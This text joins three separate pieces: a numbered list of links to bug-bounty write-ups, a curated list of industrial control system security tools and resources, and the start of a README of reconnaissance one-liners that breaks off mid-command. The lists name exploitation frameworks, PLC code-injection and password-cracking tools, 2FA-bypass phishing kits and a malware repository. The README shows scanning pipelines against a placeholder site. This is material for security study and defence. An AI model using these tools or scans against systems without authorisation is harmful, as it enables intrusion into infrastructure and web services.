https://ruvlol.medium.com/1000-for-open-redirect-via-unknown-technique-675f5815e38a -2302-Facebook SSRF: https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5 -2303-Metasploit Tips and Tricks for HaXmas 2020: https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/ -2304-SubDomain TakeOver ~ Easy WIN WIN: https://amitp200.medium.com/subdomain-takeover-easy-win-win-6034bb4147f3 -2305-Recon Methodology : https://github.com/Quikko/Recon-Methodology -2306-h1-212 CTF Writeup: https://gist.github.com/Corb3nik/aeb7c762bd4fec36436a0b5686651e69 -2307-exploiting-second-order-blind-sql-injection: https://medium.com/bugbountywriteup/exploiting-second-order-blind-sql-injection-689e98f04daa -2308-hunting-on-the-go-install-nethunter-on-unsupported-devices: https://medium.com/bugbountywriteup/hunting-on-the-go-install-nethunter-on-unsupported-devices-dd01a4f30b6a -2309-$10,000 for a vulnerability that doesn’t exist: https://medium.com/@valeriyshevchenko/10-000-for-a-vulnerability-that-doesnt-exist-9dbc63684e94 -2310-Finding bugs on Chess.com: https://medium.com/bugbountywriteup/finding-bugs-on-chess-com-739a71fbdb31 -2311-Each and every request make sense: https://akshartank.medium.com/each-and-every-request-make-sense-4572b3205382 -2312-Exploiting Max. Character Limitation: https://orthonviper.medium.com/exploiting-max-character-limitation-cde982545019 -2313-API based IDOR to leaking Private IP address of 6000 businesses: https://rafi-ahamed.medium.com/api-based-idor-to-leaking-private-ip-address-of-6000-businesses-6bc085ac6a6f -2314-Facebook bug Bounty -Finding the hidden members of the Vivek ps private events: https://vivekps143.medium.com/facebook-bug-bounty-finding-the-hidden-members-of-the-private-events-977dc1784ff9 -2315-IoT Vulnerability Assessment of the Irish IP Address Space: https://f5.com/labs/articles/threat-intelligence/iot-vulnerability-assessment-of-the-irish-ip-address-space -2316-Facebook bug bounty (500 USD) :A blocked fundraiser organizer would be unable to view or remove themselves from the fundraiser https://medium.com/bugbountywriteup/facebook-bug-bounty-500-usd-a-blocked-fundraiser-organizer-would-be-unable-to-view-or-remove-5da9f86d2fa0 -2317-This is how I was able to view anyone’s private email and birthday on Instagram: https://saugatpokharel.medium.com/this-is-how-i-was-able-to-view-anyones-private-email-and-birthday-on-instagram-1469f44b842b -2138-My Bug Bounty Journey and My First Critical Bug — Time Based Blind SQL Injection: https://marxchryz.medium.com/my-bug-bounty-journey-and-my-first-critical-bug-time-based-blind-sql-injection-aa91d8276e41 -2139-JavaScript analysis leading to Admin portal access: https://rikeshbaniyaaa.medium.com/javascript-analysis-leading-to-admin-portal-access-ea30f8328c8e -2140-SCADA hacker's toolset: https://scadahacker.com/tools.html -2141-red team phishing: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki#phishing-setup -2142-Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 -2143-Stored XSS in icloud.com: https://vbharad.medium.com/stored-xss-in-icloud-com-5000-998b8c4b2075 -2144-20 Common Tools & Techniques Used by macOS Threat Actors & Malware: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ -2145-Error-Based SQL Injection on a WordPress website and extract more than 150k user details: https://ynoof.medium.com/error-based-sql-injection-on-a-wordpress-website-and-extract-more-than-150k-user-details-f65f987c2cc0 -2146-Scope Based Recon Methodology: Exploring Tactics for Smart Recon: https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 -2147-Hail Frida!! The Universal SSL pinning bypass for Android applications: https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-e9e1d733d29 -2148-Common Tools & Techniques Used By Threat Actors and Malware — Part I : https://infosecwriteups.com/common-tools-techniques-used-by-threat-actors-and-malware-part-i-deb05b664879 -2149-Common Tools & Techniques Used By Threat Actors and Malware — Part II: https://nasbench.medium.com/common-tools-techniques-used-by-threat-actors-and-malware-part-ii-c2e65cd6b084 -2150-Tools designed to automate phishing attacks that are intended to bypass 2FA: evilginx2: https://lnkd.in/emMu_mN Modlishka: https://lnkd.in/gvGc-kZ KoiPhish: https://lnkd.in/dwzavJr ReelPhish https://lnkd.in/gjs_aC8 CredSniper:https://lnkd.in/g-jzK4y Muraena:https://lnkd.in/d2M53cs -2151-Digital Forensic Tools https://github.com/ivbeg/awesome-forensicstools/ -2152-Netcat Cheat Sheet: https://www.linkedin.com/posts/ammaramer_netcat-cheat-sheet-1-banner-grabbing-activity-6780201567527165953-bEbb -2153-Web App Hacking Methodology: https://twitter.com/cry__pto/status/1374625813404999686 -2154-Penetration Testing MindMap: https://twitter.com/cry__pto/status/1375170618501562368 -2155-Hacking Concept and Fundamentals: https://twitter.com/cry__pto/status/1376615352466046976
# awesome-industrial-control-system-security A curated list of resources related to Industrial Control System (ICS) security. Feel free to [contribute](CONTRIBUTING.md). ## Tools <table> <tr> <td> <a href="https://gitlab.com/jhcastel/attkfinder" target="_blank">AttkFinder</a> </td> <td> AttkFinder is a tool that performs static program analysis of PLC programs, and produce Data-oriented Attack vectors. In a nutshell, AttkFinder takes PLC programs written under the standard IEC-61131-3 in xml-format or structured text, and builds a Data-Flow graph (DFG), a Control-Flow graph (CFG) and translates the program into a Structured Intermediate Representation Language (STIR) version. A symbolic execution engine analyses the stir-version code searching for attack vectors that can be exploited by a malicious actuator.​ </td> </tr> <tr> <td> <a href="https://github.com/cisagov/cset" target="_blank">CSET</a> </td> <td> The Cyber Security Evaluation Tool (CSET®) assists organizations in protecting their key national cyber assets. This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. It includes both high-level and detailed questions related to all industrial control and IT systems.​ </td> </tr> <tr> <td> <a href="https://www.digitalbond.com/tools/basecamp/3s-codesys/" target="_blank">Digital Bond's 3S CoDeSys Tools</a> </td> <td> Digital Bond created three tools for interacting with PLCs that run CoDeSys, consisting of a command shell, file transfer and NMap script. </td> </tr> <tr> <td> <a href="https://github.com/digitalbond/Redpoint" target="_blank">Digital Bond's ICS Enumeration Tools</a> </td> <td> Redpoint is a Digital Bond research project to enumerate ICS applications and devices using nmap extensions. It can be used during assessments to discover ICS devices and pull information that would be helpful in secondary testing. The Redpoint tools use legitimate protocol or application commands to discover and enumerate devices and applications. There is no effort to exploit or crash anything, but be wise and careful. </td> </tr> <tr> <td> <a href="https://github.com/iadgov/GRASSMARLIN" target="_blank">GRASSMARLIN</a> </td> <td> GRASSMARLIN provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks to support network security. Passively map, and visually display, an ICS/SCADA network topology while safely conducting device discovery, accounting, and reporting on these critical cyber-physical systems. </td> </tr> <tr> <td> <a href="https://github.com/fireeye/ics_mem_collect" target="_blank">ics_mem_collect</a> </td> <td> Memory collector for GE D20MX. The project itself can be extended to work with other devices. </td> </tr> <tr> <td> <a href="https://github.com/dark-lbp/isf" target="_blank">ISF</a> </td> <td> The Industrial Exploitation Framework (ISF) is an exploitation framework similar to Metasploit written in Python. It is based on the open source Routersploit tool. It contains exploits for several types of controllers, such as QNX, Siemens and Schneider devices and includes several scanners. </td> </tr> <tr> <td> <a href="https://github.com/w3h/isf" target="_blank">ISEF</a> </td> <td> The Industrial Security Exploitation Framework (ISEF) is an exploitation framework based on the Equation Group Fuzzbunch toolkit as released by Shadow Brokers. It's developed by the ICSMASTER Security Team. </td> </tr> <tr> <td> <a href="https://github.com/momalab/ICSREF" target="_blank">ICSREF</a> </td> <td> A modular framework that automates the reverse engineering process of CODESYS binaries compiled with the CODESYS v2 compiler. </td> </tr> <tr> <td> <a href="https://github.com/momalab/ICSFuzz" target="_blank">ICSFuzz</a> </td> <td> A PLC-side fuzzing tool for uncovering vulnerabilities in ICS control applications. The current version supports only applications based on the Codesys platform which has been modified and adapted for the Wago PLC. </td> </tr> <tr> <td> <a href="https://github.com/woj-ciech/Kamerka-GUI" target="_blank">ꓘamerka GUI</a> </td> <td> Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. </td> </tr> <tr> <td> <a href="https://github.com/sourceperl/mbtget" target="_blank">mbtget</a> </td> <td> mbtget - Simple perl script for make some modbus transaction from the command line. </td> </tr> <tr> <td> <a href="https://github.com/scy-phy/minicps" target="_blank">MiniCPS</a> </td> <td> MiniCPS: A toolkit for security research on Cyber-Physical Systems from Singapore University of Technology and Design (SUTD). </td> </tr> <tr> <td> <a href="https://github.com/0x0mar/smod" target="_blank">MODBUS Penetration Testing Framework</a> </td> <td> smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. The framework can be used to perform vulnerability assessments. </td> </tr> <tr> <td> <a href="http://modbuspal.sourceforge.net/" target="_blank">ModbusPal</a> </td> <td> ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy to use interface with the capabilities to reproduce complex and realistic MODBUS environments. </td> </tr> <tr> <td> <a href="https://github.com/moki-ics/modscan" target="_blank">ModScan</a> </td> <td> ModScan is a new tool designed to map a SCADA MODBUS TCP based network. </td> </tr> <tr> <td> <a href="https://sourceforge.net/projects/nettoplcsim/" target="_blank">NetToPLCSim</a> </td> <td> TCP/IP-Network extension for the PLC simulation software Siemens PLCSim. </td> </tr> <tr> <td> <a href="https://dnp3.github.io/" target="_blank">OpenDNP3</a> </td> <td> OpenDNP3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License. It is currently in maintenance-only mode and new features are no longer being added. Automatak has rebranded as Step Function I/O and is now focused on writing protocol <a href="https://stepfunc.io/products/libraries/" target="_blank">libraries</a> in Rust. </td> </tr> <tr> <td> <a href="https://github.com/SCADACS/PLCinject" target="_blank">PLCinject</a> </td> <td> PLCinject can be used to inject code into PLCs. </td> </tr> <tr> <td> <a href="https://github.com/yanlinlin82/plcscan" target="_blank">plcscan</a> </td> <td> Tool for scaning PLC devices over the s7comm or modbus protocol. </td> </tr> <tr> <td> <a href="https://www.digitalbond.com/tools/quickdraw/download/" target="_blank">Quickdraw IDS</a> </td> <td> The Quickdraw IDS project by Digital Bond includes Snort rules for SCADA devices and so-called preprocessors for network traffic. The preprocessors provide significant additional value because of their ability to reconstruct the protocol and state for use by Snort. </td> </tr> <tr> <td> <a href="https://github.com/dw2102/S7Comm-Analyzer" target="_blank">S7Comm-Analyzer</a> </td> <td> A plugin for Bro that parses S7comm protocol data traffic. </td> </tr> <tr> <td> <a href="https://github.com/0xICF/SCADAShutdownTool" target="_blank">SCADAShutdownTool</a> </td> <td> SCADAShutdownTool is an industrial control system automation and testing tool allows security researchers and experts to test SCADA security systems, enumerate slave controllers, read controller's registers values and rewrite registers data. </td> </tr> <tr> <td> <a href="https://github.com/mssabr01/sixnet-tools" target="_blank">sixnet-tools</a> </td> <td> Tool for exploiting Sixnet RTUs. This simple command line interface allows using undocumented function codes to gain root access anc control the underlying Linux OS on certain Sixnet family industrial control devices. </td> </tr> <tr> <td> <a href="http://snap7.sourceforge.net/" target="_blank">Snap7</a> </td> <td> Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs. The new CPUs 1200/1500, the old S7200, the small LOGO 0BA7/0BA8 and SINAMICS Drives are also partially supported. </td> </tr> <tr> <td> <a href="https://github.com/klsecservices/s7scan" target="_blank">s7scan</a> </td> <td> A tool written in Python that scans networks, enumerates Siemens PLCs and gathers basic information about them, such as PLC firmware and hardware version, network configuration and security parameters. </td> </tr> <tr> <td> <a href="/source/s7-cracker.py" target="_blank">S7 Password Bruteforcer</a> </td> <td> A tool to bruteforce the password used by S7 instances from a PCAP using a dictionary. <a href="/source/s7-brute-offline.py" target="_blank">Original</a> created by SCADAStrangelove. </td> </tr> <tr> <td> <a href="https://splone.com/splonebox/" target="_blank">splonebox</a> </td> <td> splonebox is an open source network assessment tool with focus on modularity. It offers an ongoing analysis of a network and its devices. One major design decision features development of custom plugins, including ones for industrial communication protocols. </td> </tr> <tr> <td> <a href="https://www.wireshark.org/" target="_blank">Wireshark</a> </td> <td> Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. It has support for many protocols used in ICS. </td> </tr> <tr> <td> <a href="https://github.com/otoriocyber/PCS7-Hardening-Tool" target="_blank">PCS7-Hardening-Tool</a> </td> <td> A standalone PowerShell script that enumerates security issues on Siemens PCS 7 DCS servers, based on Siemens security guides. created by OTORIO </td> </tr> </table> ## Distributions <table> <tr> <td> <a href="https://github.com/moki-ics/moki" target="_blank">Moki Linux</a> </td> <td> Moki is a modification of Kali to encorporate various ICS/SCADA Tools scattered around the internet, to create a customized Kali Linux geared towards ICS/SCADA pentesting professionals. </td> </tr> <tr> <td> <a href="https://www.controlthings.io/" target="_blank">ControlThings Platform(Previously SamuraiSTFU)</a> </td> <td> The ControlThings Platform is an open source linux distribution for ICS cyber security teams. It takes the best-in-breed security assessment tools for traditional IT infrastructures and adds specialized tools for embedded electronics, proprietary wireless, and a healthy dose of ICS specific assessment tools, both from the community and custom tools created by the ControlThings I/O teams. </td> </tr> </table> ## Honeypots <table> <tr> <td> <a href="https://github.com/mushorg/conpot" target="_blank">Conpot</a> </td> <td> Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. It features easy customization and and behaviour mimicking, amongst others, and can be extended with real HMIs. Built and maintained under the Honeynet project. </td> </tr> <tr> <td> <a href="https://github.com/sjhilt/GasPot" target="_blank">GasPot</a> </td> <td> GasPot is a honeypot that has been designed to simulate a Veeder Root Gaurdian AST. These Tank Gauges are common in the oil and gas industry for Gas Station tanks to help with Inventory of fuels. GasPot was designed to randomize as much as possible so no two instances look exactly the same. </td> </tr> <tr> <td> <a href="https://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t-pot-16.03.html" target="_blank">T-Pot</a> </td> <td> T-Pot is a combination of several honeypots that run in docker containers. Suricata and the ELK stack are used for security monitoring and visualization. Amongst others, it features Conpot and eMobility, which are an ICS and next generation transport infrastructure honeypots. </td> </tr> </table> ## Data <table> <tr> <td> <a href="http://www.netresec.com/?page=PCAP4SICS" target="_blank">4SICS ICS Lab PCAPS</a> </td> <td> The "Geek Lounge" at 4SICS contains an ICS lab with PLCs, RTUs, servers, industrial network equipment (switches, firewalls, etc). These devices are available for hands-on "testing" by 4SICS attendees and traffic has been captured from these. </td> </tr> <tr> <td> <a href="https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20villages/DEF%20CON%2023%20ics%20village/DEF%20CON%2023%20ICS%20Village%20packet%20captures.rar" target="_blank">DEF CON 23 ICS Village PCAPS</a> </td> <td> PCAPS from the 23rd DEF CON. </td> </tr> <tr> <td> <a href="https://icsmap.shodan.io/" target="_blank">ICS Map</a> </td> <td> A map created from data gathered by Shodan showing ICS devices. Data is made available for further analysis. </td> </tr> <tr> <td> <a href="https://github.com/automayt/ICS-pcap" target="_blank">ICS PCAP Collection by Jason Smith</a> </td> <td> A collection of PCAPs for various ICS utilities and protocols. </td> </tr> <tr> <td> <a href="https://ics-radar.shodan.io/" target="_blank">ICS Radar</a> </td> <td> Data gathered from several types of ICS protocols by Shodan visualized on a globe. </td> </tr> <tr> <td> <a href="https://www.netresec.com/?page=DigitalBond_S4" target="_blank">S4x15 ICS Village</a> </td> <td> Mirror for the PCAPS from the S4x15 CTF as used during the contest. </td> </tr> <tr> <td> <a href="https://sourceforge.net/projects/s7commwireshark/files/Sample-captures/" target="_blank">S7 PCAP samples</a> </td> <td> Sample files for Wireshark S7 protocol dissector plugin. </td> </tr> <tr> <td> <a href="https://github.com/scadastrangelove/SCADAPASS" target="_blank">SCADAPASS</a> </td> <td> The famous SCADA StrangeLove Default/Hardcoded Passwords List. </td> </tr> <tr> <td> <a href="https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" target="_blank">TRISIS/TRITON/HATMAN malware repository</a> </td> <td> Repository containting original and decompiled files of TRISIS/TRITON/HATMAN malware targeting Triconex Safety Instrumented System (SIS) controllers. </td> </tr> <tr> <td> <a href="https://github.com/gkabasele/HVAC_Traces" target="_blank">HVAC Traces</a> </td> <td> A repository that contains PCAP traces from a HVAC system of a university that can be used to ealuate Network Intrustion Detection Systems. </td> </tr> </table> ## Frameworks <table> <tr> <td> <a href="https://github.com/nathanpocock/I-ISMS" target="_blank">I-ISMS</a> </td> <td> The Industrial Information Security Management System (I-ISMS) can be used to rapidly deploy an information security management program in an industrial setting. It provides templates for creating and implementing a program starting from the basics. </td> </tr> </table> ## Feeds and News <table> <tr> <td> <a href="https://ics-cert.us-cert.gov/alerts" target="_blank">ICS-CERT Alerts</a> </td> <td> The ICS-CERT Alert feed is intended to provide timely notification to critical infrastructure owners and operators concerning threats or activity with the potential to impact critical infrastructure computing networks. </td> </tr> <tr> <td> <a href="https://ics-cert.us-cert.gov/xml/rss.xml" target="_blank">ICS-CERT RSS Feed</a> </td> <td> The RSS feed by the United States ICS-CERT lists news and newly released vulnerability advisories. </td> </tr> <tr> <td> <a href="https://new.siemens.com/global/en/products/services/cert.html" target="_blank">Industrial Security Alerts</a> </td> <td> Siemens provides alerts for its industrial systems via this page and RSS feed. </td> </tr> <tr> <td> <a href="http://www.nerc.com/pa/rrm/bpsa/Pages/Alerts.aspx" target="_blank">North American Electric Reliability Corporation (NERC) Alerts</a> </td> <td> NERC provides alerts for Bulk Electric System (BES) security advisories and industry recommendations. </td> </tr> <tr> <td> <a href="http://new.abb.com/about/technology/cyber-security/alerts-and-notifications" target="_blank">ABB Cybersecurity Alerts and Notifications</a> </td> <td> ABB provides alerts for its cyber security incidents and software vulnerabilities. </td> </tr> <tr> <td> <a href="http://software.schneider-electric.com/support/cyber-security-updates/" target="_blank">Schneider Electric Cybersecurity Alerts and Notifications</a> </td> <td> Get the latest updates and alerts on Cyber Security and Compliance from Schneider Electric Software. </td> </tr> </table> ## Conferences and Conference Material <table> <tr> <td> <a href="https://cs3sthlm.se/" target="_blank">CS3STHLM</a> </td> <td> the Stockholm international summit on Cyber Security in SCADA and Industrial Control Systems - is an annual summit that gather the most important stakeholders across critical processes and industries. CS3STHLM has been organized since 2014, and has quickly become the premier ICS Security Summit in Northern Europe. </td> </tr> <tr> <td> <a href="https://cs3sthlm.se/" target="_blank">CS4CA</a> </td> <td> Cyber Security for Critical Assets is a global series of summits focusing on cyber security for critical infrastructure. </td> </tr> <tr> <td> <a href="https://www.sans.org/cyber-security-summit/archives" target="_blank">SANS ICS Summit Archives</a> </td> <td> Central repository for the presentation material for the SANS ICS Summits held worldwide (interleaved with other summits). </td> </tr> <tr> <td> <a href="http://www.icscybersecurityconference.com/" target="_blank">SANS ICS Cybersecurity Conference (WeissCon)</a> </td> <td> Affectionately known as WeissCon after it’s founder Joe Weiss, the conference is now owned and operated by SecurityWeek and usually runs in October at different locations each year in the US. </td> </tr> <tr> <td> <a href="https://ics.kaspersky.com/conference/" target="_blank">Kaspersky Industrial Cybersecurity conference (KICS con)</a> </td> <td> An annual international industrial cybersecurity conference run by Kaspersky. </td> </tr> <tr> <td> <a href="https://iccps.acm.org/" target="_blank">ICCPS: ACM/IEEE International Conference on Cyber-Physical Systems</a> </td> <td> The objective of ICCPS, the ACM/IEEE International Conference on Cyber-Physical Systems, is to serve as a single-track forum for reporting advances in all aspects of cyber-physical systems, including but not limited to theory, tools, applications, systems, and testbeds. </td> </tr> <tr> <td> <a href="https://www.acsac.org/2021/workshops/icss/" target="_blank">Industrial Control System Security (ICSS) Workshop</a> </td> <td> The goal of this workshop is to explore new techniques to improve security-critical control systems in the face of emerging threats. </td> </tr> <tr> <td> <a href="https://link.springer.com/book/10.1007/978-3-030-95484-0" target="_blank">Workshop on the Security of Industrial Control Systems & of Cyber-Physical Systems (CyberICPS)</a> </td> <td> CyberICPS intends to bring together researchers, engineers and governmental actors with an interest in the security of ICS and CPS in the context of their increasing exposure to cyber-space, by offering a forum for discussion on all issues related to their cyber security. </td> </tr> <tr> <td> <a href="https://cpsiotsec.github.io/" target="_blank">Workshop on CPS & IoT Security and Privacy (CPSIoTSec)</a> </td> <td> Joint Workshop on CPS&IoT Security and Privacy that aims to present work done in the areas of tackling security and privacy issues for CPS and IoT. </tr> </table> ## Literature <table> <tr> <td> <a href="https://collaborate.mitre.org/attackics/index.php/Main_Page" target="_blank">ATT&CK® for Industrial Control Systems by MITRE</a> </td> <td> ATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network. </td> </tr> <tr> <td> <a href="https://scadahacker.com/library/index.html" target="_blank">Library of Resources for Industrial Control System Cyber Security</a> </td> <td> SCADAhacker.com's ultimate list of ICS/SCADA cybersecurity resources. </td> </tr> <tr> <td> <a href="http://www.amazon.com/Applied-Cyber-Security-Smart-Grid/dp/1597499986/" target="_blank">Applied Cyber Security and the Smart Grid</a> </td> <td> Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp and Raj Samani. </td> </tr> <tr> <td> <a href="http://www.robertmlee.org/a-collection-of-resources-for-getting-started-in-icsscada-cybersecurity/" target="_blank">A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity</a> </td> <td> Robert M. Lee's thoughts on some good resources on ICS & SCADA security. </td> </tr> <tr> <td> <a href="https://documents.trendmicro.com/assets/wp/wp-hacker-machine-interface.pdf" target="_blank">Hacker Machine Interface - The State of SCADA HMI Vulnerabilities</a> </td> <td> A TrendLabs Research Paper from the Trend Micro Zero Day Initiative Team about the current state of SCADA and HMI security. </td> </tr> <tr> <td> <a href="https://www.amazon.com/Handbook-Control-Systems-Security-Second/dp/1498717071/ref=sr_1_5?s=books&ie=UTF8&qid=1472416488&sr=1-5&keywords=scada+security" target="_blank">Handbook of SCADA/Control Systems Security</a> </td> <td> This comprehensive handbook covers fundamental security concepts, methodologies, and relevant information pertaining to supervisory control and data acquisition (SCADA) and other industrial control systems used in utility and industrial facilities worldwide. </td> </tr> <tr> <td> <a href="http://www.isaca.org/Journal/archives/2014/Volume-1/Documents/SCADA-Cybersecurity-Framework_joa_Eng_0114.pdf" target="_blank">SCADA Cybersecurity Framework</a> </td> <td> Paper describing what a SCADA Cyber Security framework should consist of. </td> </tr> <tr> <td> <a href="http://www.amazon.com/Industrial-Network-Security-Second-Edition/dp/0124201148/ref=sr_1_3?ie=UTF8&qid=1414970315&sr=8-3&keywords=industrial+network+security" target="_blank">Industrial Network Security, Second Edition</a> </td> <td> Industrial Network Security, Second Edition: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp and Joel Thomas Langill. </td> </tr> <tr> <td> <a href="http://www.amazon.com/Power-System-SCADA-Smart-Grids/dp/148222674X" target="_blank">Power System SCADA and Smart Grids</a> </td> <td> The book brings together in one concise volume the fundamentals and possible application functions of power system supervisory control and data acquisition (SCADA). Not security-oriented and geared towards power systems, but a good primer into SCADA nonetheless. </td> </tr> <tr> <td> <a href="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" target="_blank">NIST SP 800-82, Revision 2</a> </td> <td> Guide to Industrial Control Systems (ICS) Security by NIST. </td> </tr> <tr> <td> <a href="https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" target="_blank">The Industrial Control System Cyber Kill Chain</a> </td> <td> This SANS paper describes the ICS Cyber Kill Chain. It tailors the Lockheed Martin Kill Chain to typical, two phase attacks on ICS systems. </td> </tr> <tr> <td> <a href="https://ics.sans.org/media/An-Abbreviated-History-of-Automation-and-ICS-Cybersecurity.pdf" target="_blank">An Abbreviated History of Automation, Industrial Control Systems, and Cybersecurity</a> </td> <td> This SANS paper looks at the background on ICS cybersecurity. Well worth the read to make sure you understand many of the events that have occurred over the past twenty years and how they’ve inspired security in ICS today. </td> </tr> <tr> <td> <a href="http://www.controleng.com/networking-security/cyber-security.html" target="_blank">Control Engineering - Networking and Security - CyberSecurity</a> </td> <td> Control Engineering magazine's cybersecurity news and literature. </td> </tr> <tr> <td> <a href="https://www.fireeye.com/blog/threat-research/2019/09/ontology-understand-assess-operational-technology-cyber-incidents.html" target="_blank">Operational Technology Cyber Security Incidents Ontology (OT-CSIO)</a> </td> <td> OT-CSIO, created by FireEye, is an ontology to understand, cross-compare and assess cyber security incidents related to operational technology. It provides guidance for assessing risks and helps making informed decisions. </td> </tr> <tr> <td> <a href="https://www.newnettechnologies.com/downloads/Implementation-Guide-for-ICS-using-the-CIS-Controls.pdf" target="_blank">CIS Controls Implementation Guide for Industrial Control Systems - Version 7</a> </td> <td> This document provides guidance on how to apply the security best practices found in CIS Controls Version 7.1 to ICS environments. </td> </tr> <tr> <td> <a href="https://www.nrdcs.lt/file/repository/resources/CIS_Controls_IoT_Companion_Guide.pdf" target="_blank">CIS Controls Internet of Things Companion Guide - Version 7.1</a> </td> <td> The objective of this document is to have broad applicability across sectors. IoT affects all areas of computingacross multiple sectors, such as healthcare, aviation, public safety, and energy. This has led to sector-specific IoT security guidance, but this document is purposefully sector-agnostic. </td> </tr> </table> ## Education <table> <tr> <td> <a href="https://github.com/Fortiphyd/GRFICSv2" target="_blank">GRFICSv2</a> </td> <td> The second version of the Graphical Realism Framework for Industrial Control Simulations (GRFICS) is a framework for realistic industrial control simulations that uses Unity 3D game engine for simulating industrial control systems. GRFICS provides users with a full virtual industrial control system (ICS) network to practice common attacks including command injection, man-in-the-middle, and buffer overflows, and visually see the impact of their attacks in the 3D visualization. Users can also practice their defensive skills by properly segmenting the network with strong firewall rules, or writing intrusion detection rules. The first version can be found <a href="https://github.com/djformby/GRFICS" target="_blank">here</a>.        </td> </tr> <tr> <td> <a href="https://github.com/hsainnos/LICSTER" target="_blank">LICSTER</a> </td> <td> LICSTER, the Low-cost ICS Security Testbed for Education and Research, aims to help setup a minimal, low-cost Industrial Control System (ICS) testbest for students, researchers, or anyone with an interest in industrial security. The project contains a list of affordable hardware to build the minimalistic ICS with, instructions, configurations and installation scripts to instantiate the system as well as various attacker scenarios and their implications. The paper can be found <a href="https://arxiv.org/abs/1910.00303", target="_blank">here</a>.        </td> </tr> </table> ## Introduction to ICS, SCADA, & PLCs <table> <tr> <td> <a href="http://plc-training.org/plc-network-to-hmi-scada.html" target="_blank">PLC Training Org</a> </td> <td> Site organizes all essential topics related to PLC training up to SCADA systems. While security is interwoven within the 10 learning phases, this is a great security article on the site for those just starting out.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=VQLRVjEFRGI" target="_blank">Control System Basics</a> </td> <td> YouTube video explaining control system basics including the type of logic these systems use to sense and create physical changes to take action upon.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=vv2CoTiaWPI" target="_blank">SCADA Systems - Utility 101 Session with Rusty Wiliiams</a> </td> <td> Utility industry professional Rusty Williams explains SCADA from an electric utility perspective.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/user/ControlLectures" target="_blank">Control System Lectures</a> </td> <td> Brian Douglas YouTube video series where he covers a wide range of topics on control systems in a very easy to process way.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/user/plcprofessor" target="_blank">The PLC Professor</a> </td> <td> The PLC Professor and his website plcprofessor.com contains a lot of great resources for learning what programmable logic controllers (PLCs) and other types of control systems and their logic are and how they work.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=2DQdEHvnqvI" target="_blank">Serial Communications RS232 and RS485</a> </td> <td> John Rinaldi of Real Time Automation describes Serial communications RS232 and RS485.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=OvRD2UvrHjE" target="_blank">All You Need To Know About MODBUS-RTU</a> </td> <td> John Rinaldi of Real Time Automation describes MODBUS-RTU.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=8FYFai21JPA" target="_blank">MODBUS Data Structures</a> </td> <td> John Rinaldi of Real Time Automation describes MODBUS data structures.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=E1nsgukeKKA" target="_blank">All You Need to Know About MODBUS-TCP</a> </td> <td> John Rinaldi of Real Time Automation describes MODBUS-TCP.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/watch?v=DL_zIjhCEpU" target="_blank">How Ethernet TCP/IP is Used by Industrial Protocols</a> </td> <td> John Rinaldi of Real Time Automation describes Ethernet TCP/IP.        </td> </tr> <tr> <td> <a href="https://www.youtube.com/channel/UCUKKQwBQZczpYzETkZNxi-w" target="_blank">RealPars</a> </td> <td> The RealPars YouTube channel has many videos on industrial automation and PLC programming.        </td> </tr> </table> ## License Licensed under [Apache License 2.0](LICENSE).
# Oneliner-Bugbounty A collection oneliner scripts for bug bounty ## List tools - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Naabu](https://github.com/projectdiscovery/naabu) - [httpx](https://github.com/projectdiscovery/httpx) - [Nuclei](https://github.com/projectdiscovery/nuclei) - [Waybackurls](https://github.com/tomnomnom/waybackurls) - [DNSProbe](https://github.com/projectdiscovery/dnsprobe) - [gf](https://github.com/tomnomnom/gf) - [sqlmap](https://github.com/sqlmapproject/sqlmap) - [qsreplace](https://github.com/tomnomnom/qsreplace) - [hakrawler](https://github.com/hakluke/hakrawler) - [Puredns](https://github.com/d3mondev/puredns) - [GauPlus](https://github.com/bp0lr/gauplus) - [uro](https://github.com/s0md3v/uro) ### Auto scanner ```bash subfinder -d site.com -all | naabu | httpx | nuclei -t nuclei-templates ``` ### Finding files (For example in here .json file) ```bash subfinder -d site.com -all | naabu | httpx | waybackurls | grep -E ".json(?:onp?)?$" ``` ### Find interesting subdomain (For example like admin.staging.example.com) ```bash subfinder -d site.com -all | dnsprobe -silent | cut -d ' ' -f1 | grep --color 